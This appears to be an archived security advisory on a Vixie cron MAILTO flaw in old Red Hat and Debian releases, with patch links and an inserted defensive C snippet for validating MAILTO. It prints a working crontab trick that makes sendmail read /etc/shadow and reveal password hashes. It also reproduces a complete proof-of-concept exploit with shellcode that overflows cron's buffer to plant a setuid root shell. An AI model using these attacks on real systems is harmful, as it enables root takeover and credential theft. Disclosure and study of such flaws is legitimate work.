COMMAND
vixie-crond
SYSTEMS AFFECTED
Red Hat Linux 4.2, 5.2, 6.0, all architectures
PROBLEM
The following is based on the Red Hat Security Advisory. By creating a
crontab that runs with a specially formatted 'MAILTO' environment
variable, it is possible for local users to overflow a
fixed-length buffer in the cron daemon's cron_popen() function.
Since the cron daemon runs as root, it would be theoretically
possible for local users to use this buffer overflow to gain root
privilege. To the best of our knowledge, no known exploits exist
at this time. Also, it was possible to use specially formatted
'MAILTO' environment variables to pass command-line options to sendmail.
Michal Zalewski added the following demonstration of the sendmail option issue:
[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
[lcamtuf@onehost lcamtuf]$ sleep 60
[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy
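Both weaknesses above come from handing an unchecked MAILTO value to a fixed buffer and then to the mailer's command line. As an added defensive illustration (not code from the advisory, the exploit or Vixie cron itself), this is the shape of the checks a patched cron needs: a bound on the value's length, a whitelist of address characters that excludes whitespace and a leading '-', and an argv built directly rather than by re-splitting a formatted command string. MAILTO_MAX, the mailer path and the "-i" flag are assumptions for the example.

```c
#include <ctype.h>
#include <string.h>

/* Assumed cap on a MAILTO value; the page does not give cron's real buffer size. */
#define MAILTO_MAX 128

/* Return 1 if mailto may be handed to the mailer as a recipient, else 0.
 * Rejects empty values, values longer than MAILTO_MAX (a fixed buffer can
 * then never be overrun), a leading '-' (the mailer would read it as an
 * option) and any byte outside a conservative address alphabet, which
 * excludes whitespace, quotes and shell metacharacters. */
int mailto_ok(const char *mailto)
{
    size_t len, i;
    if (mailto == NULL) return 0;
    len = strlen(mailto);
    if (len == 0 || len > MAILTO_MAX || mailto[0] == '-')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)mailto[i];
        if (!isalnum(c) && c != '@' && c != '.' && c != '_' && c != '-' && c != '+')
            return 0;
    }
    return 1;
}

/* Helper for exercising the length check: a value made of n copies of ch. */
int mailto_ok_repeated(char ch, size_t n)
{
    char buf[1024];
    if (n >= sizeof buf) return -1;
    memset(buf, ch, n);
    buf[n] = '\0';
    return mailto_ok(buf);
}

/* Fill the mailer's argv directly instead of formatting one command string
 * and re-splitting it on whitespace: the recipient is exactly one argv
 * element whatever it contains. Returns the argument count, or -1 if the
 * value was rejected. Mailer path and "-i" (ignore a lone dot) are assumed. */
int build_mail_argv(const char *mailto, const char *argv[], int argv_max)
{
    if (argv_max < 4 || !mailto_ok(mailto))
        return -1;
    argv[0] = "/usr/sbin/sendmail";
    argv[1] = "-i";
    argv[2] = mailto;
    argv[3] = NULL;
    return 3;
}
```

The same whitelist makes a useful audit rule over /var/spool/cron: any MAILTO line that mailto_ok() would reject deserves a look.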
jobe posted his exploit:
/*
 * VixieCron 3.0 Proof of Concept Exploit - w00w00
 *
 * Not only does Paul give up root with this one, but with his creative use of
 * strtok() he actually ends up putting the address of our shellcode in eip.
 *
 * Many Thanks: Cheez Wiz, Sangfroid
 * Thanks: stran9er, Shok
 * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
 * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
 * defacement group here>
 *
 * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
 *
 * -jbowie@el8.org
 *
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

char shellcode[] =
    "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
    "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
    "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
    "\xff/tmp/w00w00";

int
main(int argc, char *argv[])
{
    FILE *cfile, *tmpfile;
    struct stat sbuf;
    struct passwd *pw;
    int x;

    pw = getpwuid(getuid());
    chdir(pw->pw_dir);
    cfile = fopen("./cronny", "a+");
    tmpfile = fopen("/tmp/w00w00", "a+");
    fprintf(cfile, "MAILTO=");
    for (x = 0; x < 96; x++)
        fprintf(cfile, "w00w00 ");
    fprintf(cfile, "%s", shellcode);
    fprintf(cfile, "\n* * * * * date\n");
    fflush(cfile);
    fprintf(tmpfile, "#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir, pw->pw_dir);
    fflush(tmpfile);
    fclose(cfile), fclose(tmpfile);
    chmod("/tmp/w00w00", S_IXUSR | S_IXGRP | S_IXOTH);
    if (!(fork())) {
        execl("/usr/bin/crontab", "crontab", "./cronny", (char *)0);
    } else {
        printf("Waiting for shell be patient....\n");
        for (;;) {
            if (!(stat("./bash", &sbuf))) {
                break;
            } else {
                sleep(5);
            }
        }
        if ((fork())) {
            printf("Thank you for using w00warez!\n");
            execl("./bash", "bash", (char *)0);
        } else {
            remove("/tmp/w00w00");
            sleep(5);
            remove("./bash");
            remove("./cronny");
            execl("/usr/bin/crontab", "crontab", "-r", (char *)0);
        }
    }
}
SOLUTION
Red Hat Linux, RPMs required:
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/i386/vixie-cron-3.0.1-37.4.2.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/alpha/vixie-cron-3.0.1-37.4.2.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/sparc/vixie-cron-3.0.1-37.4.2.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/vixie-cron-3.0.1-37.4.2.src.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/i386/vixie-cron-3.0.1-37.5.2.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/alpha/vixie-cron-3.0.1-37.5.2.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/sparc/vixie-cron-3.0.1-37.5.2.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/vixie-cron-3.0.1-37.5.2.src.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/i386/vixie-cron-3.0.1-38.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/alpha/vixie-cron-3.0.1-38.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/sparc/vixie-cron-3.0.1-38.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/vixie-cron-3.0.1-38.src.rpm
Debian GNU/Linux 2.1 alias slink:
http://security.debian.org/dists/stable/updates/source/cron_3.0pl1-50.2.diff.gz
http://security.debian.org/dists/stable/updates/source/cron_3.0pl1-50.2.dsc
http://security.debian.org/dists/stable/updates/source/cron_3.0pl1.orig.tar.gz
http://security.debian.org/dists/stable/updates/binary-alpha/cron_3.0pl1-50.2_alpha.deb
http://security.debian.org/dists/stable/updates/binary-i386/cron_3.0pl1-50.2_i386.deb
http://security.debian.org/dists/stable/updates/binary-m68k/cron_3.0pl1-50.2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-sparc/cron_3.0pl1-50.2_sparc.deb
Debian GNU/Linux pre2.2 alias potato:
http://security.debian.org/dists/unstable/updates/source/cron_3.0pl1-52.diff.gz
http://security.debian.org/dists/unstable/updates/source/cron_3.0pl1-52.dsc
http://security.debian.org/dists/unstable/updates/source/cron_3.0pl1.orig.tar.gz
http://security.debian.org/dists/unstable/updates/binary-alpha/cron_3.0pl1-52_alpha.deb
http://security.debian.org/dists/unstable/updates/binary-arm/cron_3.0pl1-52_arm.deb
http://security.debian.org/dists/unstable/updates/binary-i386/cron_3.0pl1-52_i386.deb
http://security.debian.org/dists/unstable/updates/binary-m68k/cron_3.0pl1-52_m68k.deb
http://security.debian.org/dists/unstable/updates/binary-powerpc/cron_3.0pl1-52_powerpc.deb
http://security.debian.org/dists/unstable/updates/binary-sparc/cron_3.0pl1-52_sparc.deb